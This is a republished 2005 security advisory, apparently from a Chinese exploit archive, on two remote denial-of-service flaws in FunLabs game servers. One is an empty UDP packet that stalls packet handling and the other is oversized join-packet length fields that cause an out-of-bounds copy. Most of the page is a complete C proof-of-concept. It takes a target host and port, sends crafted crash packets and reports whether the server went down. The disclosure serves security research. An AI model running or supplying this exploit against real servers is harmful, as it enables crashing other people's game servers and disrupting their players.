首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FunLabs Games Multiple Vulnerabilities
来源:http://aluigi.altervista.org 作者:Luigi 发布时间:2005-03-30  

FunLabs Games Multiple Vulnerabilities

Summary
FunLabs is "a software house that develops low-cost games". FunLabs' games: 4X4 Off-road Adventure III, Cabela's Big Game Hunter, Cabela's Dangerous Hunts, Cabela's Deer Hunt, Revolution, Secret Service - In harm's Way, Shadow Force: Razor Unit, US Most Wanted: Nowhere To Hide and others have been found to contain two security vulnerabilities that would allow a remote attacker to cause the program to crash.

Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/funlabsboom-adv.txt

Details
Socket Unreacheable
The engine uses an asynchronous socket through FIONREAD that returns the length of the latest packet received by the socket. If an attacker sends an empty UDP packet the server will be not able to know that a new packet is arrived (because ioctlsocket continues to return zero) and so it can no longer handle new packets.

Access to Unallocated Memory
This partially in-game bug happens when an attacker sets the two 16 bits numbers inside the join packet to maximum values. Doing that forces the server to copy a bigger amount of data from the buffer that has received the packet to a new one but with an invalid access to the unallocated memory located after the shorter source buffer. That causes the immediate termination of the server.

Exploit:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/funlabsboom.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 4096
#define TIMEOUT 3

#define SEND(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err();
#define RECV if(timeout(sd) < 0) { \
fputs("\n" \
"Error: socket timeout, no reply received. Probably the server is offline or\n" \
" the match is already started or it is full\n" \
"\n", stdout); \
exit(1); \
} \
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();

u_long resolv(char *host);
int timeout(int sock);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack;
u_short port;
u_char buff[BUFFSZ],
pck1[] = "\x01\x00\x00\x00\x00" "\xff\xff\xff\xff",
pck2[] = "\x03\x01",
pck3a[] = "\x03\x02",
pck3b[] = "\x0c",
pck3c[] = "\x04\x02\x00\x00\x00"
"\x00\x00" // size 1
"\x04" // ???
"\x00\x00" // size 2
"\x08" // message code
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

setbuf(stdout, NULL);

fputs("\n"
"FunLabs games multiple Denial of Service "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 4) {
printf("\n"
"Usage: %s <attack> <host> <port>\n"
"\n"
"Attacks:\n"
" 1 = socket unreacheable through an UDP packet of zero bytes\n"
" 2 = memcpy() with access to unallocated source memory (in-game)\n"
" 3 = in-game strange NULL pointer access (works only versus some games like\n"
" Razor for example)\n"
"\n", argv[0]);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- request informations:\n", stdout);
SEND("\x0a");
RECV;
printf("\n Players: %d/%d\n", buff[5], buff[6]);

attack = atoi(argv[1]) & 3;

fputs("\n- send BOOM packet: ", stdout);
if(attack == 1) {
SEND("");
fputc('.', stdout);
} else {
*(u_short *)(pck1 + 5) = time(NULL);
if(attack == 2) {
*(u_short *)(pck3c + 5) = *(u_short *)(pck3c + 8) = 0xffff;
} else {
*(u_short *)(pck3c + 5) = sizeof(pck3c) - 8;
*(u_short *)(pck3c + 8) = sizeof(pck3c) - 11;
}

SEND(pck1);
RECV;
fputc('.', stdout);

SEND(pck2);
RECV;
fputc('.', stdout);

SEND(pck3a);
SEND(pck3b);
SEND(pck3c);
RECV;
fputc('.', stdout);
}

fputs("\n- check server\n", stdout);
SEND("\x0a");
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n", stdout);
}

close(sd);
return(0);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Smail preparse_address_1() Hea
·PunBB v1.2.2 functions.php Rem
·Tincat Buffer Overflow
·Mtftpd Server v0.0.3 Remote Bu
·OpenMosixView Multiple Race Co
·Cyrus imapd v2.2.8 Remote Comm
·LimeWire File Disclosure Explo
·Linux Kernel v2.6.10 Remote De
·Microsoft Windows WAB DoS
·Linux Kernel v2.6.10 Remote De
·MailEnable Format String Vulne
·BakBone NetVault configure.cfg
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved